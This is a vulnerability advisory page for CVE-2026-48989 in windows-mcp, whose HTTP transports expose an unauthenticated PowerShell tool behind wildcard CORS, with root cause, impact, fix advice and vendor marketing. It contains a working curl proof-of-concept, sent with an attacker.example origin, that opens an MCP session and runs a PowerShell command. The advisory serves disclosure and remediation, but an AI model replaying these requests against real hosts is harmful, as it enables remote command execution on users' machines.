CVE-2026-48989

CVE-2026-48989 is a high-severity missing authentication for critical function vulnerability in windows-mcp (pip), affecting versions < 0.7.5. It is fixed in 0.7.5.

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Summary

Windows-MCP: HTTP transports expose unauthenticated PowerShell control with wildcard CORS

HTTP transports expose unauthenticated PowerShell control with wildcard CORS

There is an issue in the SSE and Streamable HTTP transport modes. The default stdio mode is not affected, but the documented HTTP modes expose the MCP control plane without authentication and add wildcard CORS handling around it. The same server exposes the PowerShell tool, which executes caller-controlled commands as the Windows user running Windows-MCP.

Relevant source:

  • src/windows_mcp/__main__.py:37-42: _http_middleware() installs OptionsMiddleware and CORSMiddleware with allow_origins=["*"], allow_methods=["*"], and allow_headers=["*"].
  • src/windows_mcp/__main__.py:45-72: OptionsMiddleware responds to every OPTIONS request with wildcard Access-Control-Allow-Origin, Access-Control-Allow-Methods, and Access-Control-Allow-Headers.
  • src/windows_mcp/__main__.py:75-113: _build_mcp() constructs FastMCP(name="windows-mcp", ...) without an auth provider.
  • src/windows_mcp/__main__.py:139-151: both sse and streamable-http call mcp.run(...) with that middleware and no application-level auth/security settings.
  • src/windows_mcp/tools/shell.py:10-24: registers the PowerShell tool and passes caller-controlled command to PowerShellExecutor.execute_command.
  • src/windows_mcp/desktop/powershell.py:176-204: executes that command through PowerShell -EncodedCommand.
  • README.md:421-424 and 433-434: documents the HTTP transports and describes Streamable HTTP as network-accessible HTTP streaming.

In an affected configuration, a client that can reach http://localhost:8000/mcp can initialize an MCP session and invoke tools/call for PowerShell. The issue is not just that PowerShell is powerful; it is that the HTTP control plane around that tool is unauthenticated and configured with wildcard CORS.

Root cause

The HTTP transport entry points compose two independent design decisions that fail-open together: the FastMCP instance is built without any authentication provider, and the middleware stack installs blanket wildcard CORS (allow_origins=*, allow_methods=*, allow_headers=*) that explicitly permits cross-origin browsers and any non-browser HTTP client to reach the MCP control plane. Either one alone would be a partial defense; together, the unauthenticated control plane is reachable from arbitrary origins, with no host-validation, no token check, and no DNS-rebinding mitigation between an attacker's request and the registered PowerShell tool. The structural fix is to require an auth provider (token, mTLS, or local-only secret handshake) on the HTTP transports and to scope CORS to a specific operator-configured allowlist rather than applying wildcard policy to a tool surface that includes shell execution.

Auth boundary violated

Boundary: Network trust domain (an unauthenticated remote/cross-origin caller is treated as if it were a trusted local MCP client with rights to invoke privileged shell tools).

Respected at: stdio transport path (src/windows_mcp/__main__.py stdio branch), the default transport relies on parent-process pipe ownership for caller identity, which is a real OS-level boundary.

Violated at: src/windows_mcp/__main__.py:139-151 (SSE and Streamable HTTP branches call mcp.run(...) with the wildcard-CORS middleware installed at :37-42 and no auth provider attached at :75-113). The boundary is silently dropped: there is no code path between the inbound HTTP request and tools/call for PowerShell (src/windows_mcp/tools/shell.py:10-24src/windows_mcp/desktop/powershell.py:176-204) that asserts caller identity or origin.

Minimal protocol proof from a matching FastMCP 3.2.4 harness with the same middleware posture:

$ curl -i -s -X OPTIONS 'http://127.0.0.1:18123/mcp/' \
  -H 'Origin: https://attacker.example' \
  -H 'Access-Control-Request-Method: POST' \
  -H 'Access-Control-Request-Headers: content-type,mcp-session-id'

HTTP/1.1 200 OK
access-control-allow-origin: *
access-control-allow-methods: *
access-control-allow-headers: *

$ curl -i -s 'http://127.0.0.1:18123/mcp' \
  -H 'Origin: https://attacker.example' \
  -H 'Content-Type: application/json' \
  -H 'Accept: application/json, text/event-stream' \
  --data '{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2025-06-18","capabilities":{},"clientInfo":{"name":"evil-page","version":"1"}}}'

HTTP/1.1 200 OK
content-type: text/event-stream
mcp-session-id: c67be0098b7643eb961b2fd0185ee043
access-control-allow-origin: *

$ curl -i -s 'http://127.0.0.1:18123/mcp' \
  -H 'Origin: https://attacker.example' \
  -H 'Mcp-Session-Id: c67be0098b7643eb961b2fd0185ee043' \
  -H 'Content-Type: application/json' \
  -H 'Accept: application/json, text/event-stream' \
  --data '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"PowerShell","arguments":{"command":"calc.exe","timeout":30}}}'

HTTP/1.1 200 OK
content-type: text/event-stream
mcp-session-id: c67be0098b7643eb961b2fd0185ee043
access-control-allow-origin: *

event: message
data: {"jsonrpc":"2.0","id":2,"result":{"content":[{"type":"text","text":"executed: calc.exe"}],"structuredContent":{"result":"executed: calc.exe"},"isError":false}}

Impact

For affected HTTP-transport deployments, successful exploitation gives arbitrary PowerShell execution as the user running Windows-MCP. There is an important browser caveat: current Chrome/Edge Local Network Access / Private Network Access behavior may block or prompt for public-site-to-localhost requests because this middleware does not return Access-Control-Allow-Private-Network: true. The exposure still applies to same-origin/private-origin contexts, browsers or apps without that enforcement, user-approved local-network prompts, browser extensions, and non-browser HTTP clients.

Suggested fix: require authentication for HTTP transports, remove wildcard CORS from MCP control endpoints, restrict origins to explicit trusted clients, and enable/propagate transport security settings such as host validation. If unauthenticated HTTP is retained for development, I would make it an explicit unsafe flag and add regression tests for cross-origin OPTIONS, initialize, and tools/call.

A critical operation is accessible without requiring any authentication. Typical impact: any user can invoke the privileged function.

Affected versions

windows-mcp (< 0.7.5)

Security releases

windows-mcp → 0.7.5 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

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Remediation advice

Upgrade windows-mcp to 0.7.5 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-48989? CVE-2026-48989 is a high-severity missing authentication for critical function vulnerability in windows-mcp (pip), affecting versions < 0.7.5. It is fixed in 0.7.5. A critical operation is accessible without requiring any authentication.
  2. Which versions of windows-mcp are affected by CVE-2026-48989? windows-mcp (pip) versions < 0.7.5 is affected.
  3. Is there a fix for CVE-2026-48989? Yes. CVE-2026-48989 is fixed in 0.7.5. Upgrade to this version or later.
  4. Is CVE-2026-48989 exploitable, and should I be worried? Whether CVE-2026-48989 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-48989 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-48989? Upgrade windows-mcp to 0.7.5 or later.

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